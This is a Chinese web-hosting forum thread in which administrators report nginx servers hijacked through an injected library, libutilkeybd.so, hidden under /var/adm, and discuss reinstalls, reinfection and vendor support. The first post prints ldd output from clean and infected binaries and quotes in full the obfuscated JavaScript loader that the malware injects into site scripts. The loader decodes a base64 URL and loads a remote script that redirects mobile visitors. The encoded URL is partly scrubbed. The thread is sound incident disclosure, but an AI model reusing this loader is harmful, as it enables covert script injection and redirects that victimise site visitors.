【待反馈】手机端首次访问会跳转灰产网站的进
在终端执行,可能系统不同命令不同ldd /www/server/nginx/sbin/nginx如果你的Nginx是正常的,回返回
linux-vdso.so.1 (0x00007fff05e6b000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007f9299c54000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007f9299c1a000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007f9299b8c000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f9299b70000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007f929998e000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007f9299926000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f92996fb000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f92994cf000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f92994af000)
/lib64/ld-linux-x86-64.so.2 (0x00007f929a4e3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f92993c8000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007f92991cd000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f92991a2000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007f9299165000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007f929911b000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007f9299053000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007f9298fd2000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007f9298fbd000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007f9298f34000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007f9298ec5000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007f92972a7000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007f9297276000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007f929726d000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007f929725f000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007f929711d000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007f929704e000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007f929703d000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007f9297019000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007f9296ff6000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007f9296fca000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007f9296fc4000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007f9296fbc000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007f9296fa4000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007f9296f97000)经过多台服务器的对比 , 出现我发帖标题情况的,回返回
linux-vdso.so.1 (0x00007fff25feb000)
/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007fcf73b79000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fcf7417d000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007fcf740ef000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007fcf740d3000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007fcf73997000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007fcf74069000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcf7376e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fcf74064000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007fcf73542000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007fcf74044000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcf747b3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fcf7345b000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007fcf73260000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007fcf74017000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007fcf73225000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007fcf731db000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007fcf73113000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007fcf73092000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007fcf7307d000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007fcf72ff4000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007fcf72f87000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007fcf71369000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007fcf71338000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007fcf7132f000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007fcf71321000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007fcf711e1000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007fcf71112000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007fcf71101000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007fcf710dd000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007fcf710b8000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007fcf7108e000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007fcf71088000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007fcf71080000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007fcf71068000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007fcf71059000)可以看到多了一个
/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)有可能不在var/adm也有可能在 etc/adm 在这个文件夹的话大概率是被隐藏起来了看不到这个的
他会随机在你网站引用的js上面添加这段恶意代码 达到首次手机端访问时跳转灰产
if (window && !window.hijs) {
window.hijs = true;
function xxSJRox(e) {
var t = ""
, n = r = c1 = c2 = 0;
while (n < e.length) {
r = e.charCodeAt(n);
if (r < 128) {
t += String.fromCharCode(r);
n++
} else if (r > 191 && r < 224) {
c2 = e.charCodeAt(n + 1);
t += String.fromCharCode((r & 31) << 6 | c2 & 63);
n += 2
} else {
c2 = e.charCodeAt(n + 1);
c3 = e.charCodeAt(n + 2);
t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
n += 3
}
}
return t
}
function aPnDhiTia(e) {
var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var t = "", n, r, i, s, o, u, a, f = 0;
e = e.replace(/[^A-Za-z0-9+/=]/g, "");
while (f < e.length) {
s = m.indexOf(e.charAt(f++));
o = m.indexOf(e.charAt(f++));
u = m.indexOf(e.charAt(f++));
a = m.indexOf(e.charAt(f++));
n = s << 2 | o >> 4;
r = (o & 15) << 4 | u >> 2;
i = (u & 3) << 6 | a;
t = t + String.fromCharCode(n);
if (u != 64) {
t = t + String.fromCharCode(r)
}
if (a != 64) {
t = t + String.fromCharCode(i)
}
}
return xxSJRox(t)
}
eval('window')['\x4d\x66\x58\x4b\x77\x56'] = function() {
;(function(u, r, w, d, f, c) {
var x = aPnDhiTia;
u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'), c)));
'jQuery';
k = r + 'c' + f;
'Flex';
v = k + f;
var s = d.createElement(v + c + c)
, g = function() {};
s.type = 'text/javascript';
{
s.onload = function() {
g()
}
}
s.src = u;
'CSS';
d.getElementsByTagName('head').appendChild(s)
}
)('aHR0cHM6和谐一段,防止解析出来正确的xpdnIuY29tL25wbS9ib290c3RyYXBANS4zLjAvZGlzdC9jc3MvYm9vdHN0cmFwLm1pbi5jc3M/dj0zLjcuOC4y', 'FgsPmaNtZ', window, document, 'jrGYBsijJU', 'ptbnNbK')
}
;
if (!(/^Mac|Win/.test(navigator.platform)))
MfXKwV();
}
**威胁类型**: Web服务器劫持 + JavaScript注入 + 中间人攻击
不知道能不能通过重装NGINX来解决
反正我是直接备份了数据 直接重装就没有这个库了 至于怎么被篡改的尚未可知 手里的几台物理机全部遭殃 目前重装了一台 等待测试看什么时候再次被篡改
如果你有不通过重装系统的解决办法欢迎分享
你好,感谢发帖,可以的话您联系我们官网客服,我司安全部协助您排查下 堡塔开发kk 发表于 2025-11-18 11:00
你好,感谢发帖,可以的话您联系我们官网客服,我司安全部协助您排查下
var/adm 这个目录昨天我发帖时还是可见的9.6.0版本 我刚刚升级了 11.2版本这个目录就被隐藏了 我另外9.6的服务器还是可见 面板也占一定原因? 24143751 发表于 2025-11-18 16:05
var/adm 这个目录昨天我发帖时还是可见的9.6.0版本 我刚刚升级了 11.2版本这个目录就被隐藏了 ...
面板升级和这个无关,联系客服 我们协助排查 六台服务器 全军覆没 全部重装了 没找到哪里的问题 我同事的好几个服务器 也是这种情况 卸载了nginx在重装 没解决问题 准确的说,是网站显示灰产内容,但是检查网站没问题,把网站迁移到别的服务器就没出现过 坚果互联 发表于 2025-11-21 23:10
准确的说,是网站显示灰产内容,但是检查网站没问题,把网站迁移到别的服务器就没出现过 ...
我的也是物理机中招,也是这个文件夹里面出现问题,还没试过重装,修复不到一个星期就再次出现这个 已经中招了,重装系统了,重装nginx没用,切到阿帕奇就不跳了 口香糖之歌 发表于 2025-11-29 11:36
我的也是物理机中招,也是这个文件夹里面出现问题,还没试过重装,修复不到一个星期就再次出现这个 ...
我的虚拟机也中了,而且是两次,不知道怎么办。
页:
[1]